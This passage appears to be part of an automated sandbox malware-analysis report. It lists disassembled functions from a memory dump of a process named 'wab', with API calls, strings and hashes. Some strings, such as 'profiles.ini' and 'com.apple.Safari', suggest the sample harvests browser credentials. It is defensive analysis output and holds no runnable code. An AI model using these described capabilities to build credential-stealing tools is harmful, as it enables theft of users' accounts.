                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID:
                  • API String ID: 2081463915-0
                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastRead
                  • String ID:
                  • API String ID: 2136311172-0
                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@
                  • String ID:
                  • API String ID: 1936579350-0
                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                  Non-executed Functions

                  Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                  • GetLastError.KERNEL32 ref: 0040995D
                  • CloseHandle.KERNEL32(?), ref: 00409969
                  • GetLastError.KERNEL32 ref: 00409974
                  • CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                  • String ID:
                  • API String ID: 2565263379-0
                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                  Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                  Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                  Download Yara Rule
                  APIs
                  • EmptyClipboard.USER32 ref: 00409882
                  • wcslen.MSVCRT ref: 0040988F
                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                  • memcpy.MSVCRT ref: 004098B5
                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                  • CloseClipboard.USER32 ref: 004098D7
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                  • String ID:
                  • API String ID: 2014503067-0
                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32 ref: 004182D7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                  • LocalFree.KERNEL32(?), ref: 00418342
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                  • String ID: OsError 0x%x (%u)
                  • API String ID: 403622227-2664311388
                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                  Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  • OpenClipboard.USER32(?), ref: 00411878
                  • GetLastError.KERNEL32 ref: 0041188D
                  • DeleteFileW.KERNEL32(?), ref: 004118AC
                    • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                    • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                    • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                    • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                    • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                    • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                    • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                    • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                    • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                  • String ID:
                  • API String ID: 1203541146-0
                  • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                  • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                  • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                  • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                  Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                  Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                  Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: NtdllProc_Window
                  • String ID:
                  • API String ID: 4255912815-0
                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                  Download Yara Rule
                  APIs
                  • _wcsicmp.MSVCRT ref: 004022A6
                  • _wcsicmp.MSVCRT ref: 004022D7
                  • _wcsicmp.MSVCRT ref: 00402305
                  • _wcsicmp.MSVCRT ref: 00402333
                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                  • memset.MSVCRT ref: 0040265F
                  • memcpy.MSVCRT ref: 0040269B
                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  • memcpy.MSVCRT ref: 004026FF
                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                  • API String ID: 577499730-1134094380
                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                  Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                  • String ID: :stringdata$ftp://$http://$https://
                  • API String ID: 2787044678-1921111777
                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                  • GetWindowRect.USER32(?,?), ref: 00414088
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                  • GetDC.USER32 ref: 004140E3
                  • wcslen.MSVCRT ref: 00414123
                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                  • ReleaseDC.USER32(?,?), ref: 00414181
                  • _snwprintf.MSVCRT ref: 00414244
                  • SetWindowTextW.USER32(?,?), ref: 00414258
                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                  • GetClientRect.USER32(?,?), ref: 004142E1
                  • GetWindowRect.USER32(?,?), ref: 004142EB
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                  • GetClientRect.USER32(?,?), ref: 0041433B
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 2080319088-3046471546
                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                  Download Yara Rule
                  APIs
                  • EndDialog.USER32(?,?), ref: 00413221
                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                  • memset.MSVCRT ref: 00413292
                  • memset.MSVCRT ref: 004132B4
                  • memset.MSVCRT ref: 004132CD
                  • memset.MSVCRT ref: 004132E1
                  • memset.MSVCRT ref: 004132FB
                  • memset.MSVCRT ref: 00413310
                  • GetCurrentProcess.KERNEL32 ref: 00413318
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                  • memset.MSVCRT ref: 004133C0
                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                  • memcpy.MSVCRT ref: 004133FC
                  • wcscpy.MSVCRT ref: 0041341F
                  • _snwprintf.MSVCRT ref: 0041348E
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                  • SetFocus.USER32(00000000), ref: 004134B7
                  Strings
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                  • {Unknown}, xrefs: 004132A6
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                  • API String ID: 4111938811-1819279800
                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                  • EndDialog.USER32(?,?), ref: 0040135E
                  • DeleteObject.GDI32(?), ref: 0040136A
                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                  • ShowWindow.USER32(00000000), ref: 00401398
                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                  • ShowWindow.USER32(00000000), ref: 004013A7
                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                  • String ID:
                  • API String ID: 829165378-0
                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00404172
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 004041D6
                  • wcscpy.MSVCRT ref: 004041E7
                  • memset.MSVCRT ref: 00404200
                  • memset.MSVCRT ref: 00404215
                  • _snwprintf.MSVCRT ref: 0040422F
                  • wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 0040426E
                  • memset.MSVCRT ref: 004042CD
                  • memset.MSVCRT ref: 004042E2
                  • _snwprintf.MSVCRT ref: 004042FE
                  • wcscpy.MSVCRT ref: 00404311
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                  • API String ID: 2454223109-1580313836
                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                  • SetMenu.USER32(?,00000000), ref: 00411453
                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                  • memcpy.MSVCRT ref: 004115C8
                  • ShowWindow.USER32(?,?), ref: 004115FE
                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                  Strings
                  Memory Dump Source
